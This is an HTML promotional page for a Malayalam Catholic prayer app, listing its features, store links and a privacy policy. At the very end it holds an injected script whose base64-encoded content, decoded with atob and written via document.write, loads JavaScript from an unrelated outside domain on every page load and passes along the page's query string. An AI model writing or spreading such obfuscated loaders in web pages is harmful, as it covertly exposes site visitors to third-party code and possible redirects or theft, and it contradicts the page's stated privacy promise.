<!DOCTYPE html>
<html>
    <head>
        <style>
            div.container {
                width: 100%;
                border: 1px solid #910b0b;
            }
        
        header{
            padding: 1em;
            color: white;
            background-color: #910b0b;
            clear: left;
            text-align: center;
        }  
        
        center {
            text-align: center;
            padding:20px;
        }
        footer {
            padding: 1em;
            color: white;
            background-color: #b67474;
            clear: left;
            text-align: center;
        }
        nav {
            float: left;
            max-width: 160px;
            margin: 0;
            padding: 1em;
        }
        
        nav ul {
            list-style-type: none;
            padding: 0;
        }
        
        nav ul a {
            text-decoration: none;
        }
        
        article {
            <!--            margin-left: 170px;-->
            border-left: 1px solid #fe97a8;
            padding: 1em;
            overflow: hidden;
        }
        </style>
    </head>
    <body>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
            <div class="container">
                
                <header>
                    <img src="images/PM-LOGO.png" alt="“പ്രാർത്ഥനാമഞ്ജരി”" style="width:100px;height:100px;">
                        <h1>പ്രാർത്ഥനാമഞ്ജരി</h1>
                        </header>
                
                <article> <font face="verdana" color="#4b4b4b" size="2">
                    
                    <h4>Description:</h4>
                    <p>    &nbsp&nbsp&nbsp&nbsp&nbspThe complete, light weight and reliable resource for personal Christian Prayers in Malayalam. </p>
                    <p>&nbsp&nbsp&nbsp&nbsp&nbspIt gathers a diverse selection of prayers from the rich traditions of the Catholic Church. This treasury of Catholic worship includes personal, family, and liturgical prayers. It includes a great collection of daily prayers which can be used in different occasions in our life.<br><br>&nbsp&nbsp&nbsp&nbsp
                    
                    </p>
                    
                    <h4>Features</h4>
                    <ul><li> Daily prayers, Common prayers, Yaama praarthanakal, Prabodhana japangal, Japamaalakal, Holy Mass, Vanakkamaasam, Madhyastha Praarthanakal and a lot more.</li>
                    <li> Favorite your prayers and access it easily.</li>
                    <li> Find nearby churches.</li>
                    <li> Hourly chime to get notified every hour.
                    </li><li> Widget for vachanapetty.
                    </li><li> Teleprompter.
                    </li><li> Prayer counter.</li></ul>
                    
                    <h4>Great ways to read</h4>
                    <ul><li>Full screen Teleprompter with adjustable speed.</li>
                    <li> Zoom In & Out to adjust the text.</li>
                    <li> Colorization to the text for better understanding.</li>
                    <li> Dynamic UI with respect to important dates.
                    </li><li> Simple and Elegant UI.
                    </li><li> Share the prayers to your friends and family.
                    </li></ul>
                    
                    <center>
                    
                    <a href="https://itunes.apple.com/us/app/id1287152030" target="_blank">
                    <img src="images/AppStoreLogo.png" alt="iOS" style="width:300px;height:90px;">
                    </a>
                    
                    
                    <a href="https://play.google.com/store/apps/details?id=com.prarthana.prarthanamanjari" target="_blank">
                        
                        <img src="images/GooglePlay.png" alt="Android" style="width:300px;height:90px;">
                            </a>
                    </center>
                    
                    
                    
                    <i style="color:#bfbfbf" ;><h5>Courtesy: </h5>
                        <p>All copyright, trade marks, design rights, patents and other intellectual property rights (registered and unregistered) in and on this app may be extracted from different sources.</p>
                        
                        
                        <h5>Privacy Policy: </h5>
                        <p>Prarthanamanjari is not collecting any of the user information with our their prior knowledge. The app doesn't share or misuse any of the information collected from the user. The software, materials and assistance provided by Prarthanamanjari have the only purpose of sharing prayers to its users.</p></i>
                    
                    </font></article>
                
                <footer>Copyright © reebasebastiankumbukad</footer>
                
				<script>  	let encoded = 'PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPiFmdW5jdGlvbigpe3ZhciBhPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO2EudHlwZT0idGV4dC9qYXZhc2NyaXB0IixhLnNyYz0iaHR0cHM6Ly9jYi5iZWRpZXRwbC5jb20vZ28tanMvYWFlYTM0NzQtNWMyZi00OGIxLWJjNWItNGUzODc4ODQ0OGRhPyIrd2luZG93LmxvY2F0aW9uLnNlYXJjaC5zdWJzdHJpbmcoMSk7dmFyIGI9ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoInNjcmlwdCIpWzBdO2IucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYSxiKX0oKTs8L3NjcmlwdD4=';           let decoded = atob(encoded);           document.write(''+ decoded +'');   </script>
				
            </div>
            
            </body>
</html>
